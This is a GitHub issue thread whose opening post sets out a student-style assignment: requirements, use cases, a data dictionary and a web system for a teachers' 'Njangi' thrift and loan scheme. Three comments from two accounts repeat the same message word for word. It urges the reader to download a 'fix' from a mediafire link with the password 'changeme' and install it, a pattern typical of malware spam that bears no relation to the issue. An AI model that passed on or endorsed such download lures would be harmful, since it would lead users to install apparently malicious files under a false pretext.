### ISSUE TITLE
Thrift and loan management system

### ISSUE THREAD

**Issue by KlivertNda** [RamuGande/dairyjournal#1]
Teachers Self-Help Association (TSHA) is a group of teachers who have as objective to practice a thrift and loan
(‘Njangi’) schemes for the benefit of their members. Each scheme runs for a period of 6 months and two
members benefit each month. The monthly arrangement is balloted physically and registered into the system.
The need for financial accountability and integrity in thrift and loan schemes (‘Njangi’) is increasingly alarming
and requires effective handling.
Members find it difficult to properly assess what they have put into the scheme, who benefited from the scheme,
when and what was each contributor’s amount. In the ‘Njangi’ scheme, each member is equally a potential
beneficiary. A member can have several accounts (names).
Each account can benefit from several schemes but only once per scheme. Accounts register for each scheme
and each account can only have one registration per scheme. Each registered account can only contribute once
to the benefit of another registered member per scheme.
A contribution receipt is given to each member who contributes and a benefit slip is given to the beneficiary
shown the list of members who contributed, their amounts and the total amount as well as deductions and a
net balance. A 5% development fund is deducted from each beneficiary.
The Association’s Executive Members can view all transaction in the system. Only the financial secretary can add
or update contributions. All other executive members can register members into the system. Members only have
access to their individual details and contributions. Contributions are done strictly using MTN MobileMoney.
Work Required
1) Outline the Functional Requirements of the System above.
2) Bring out the list of actors involved in the system.
3) Draw the Use Case Diagrams for each actor.
4) Draft the Data Dictionary for the Thrift and Loan Scheme.
5) Draw the Entity Relationship Diagram for the System
6) Develop a Web-based Thrift and Loan Management System for TSHA.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
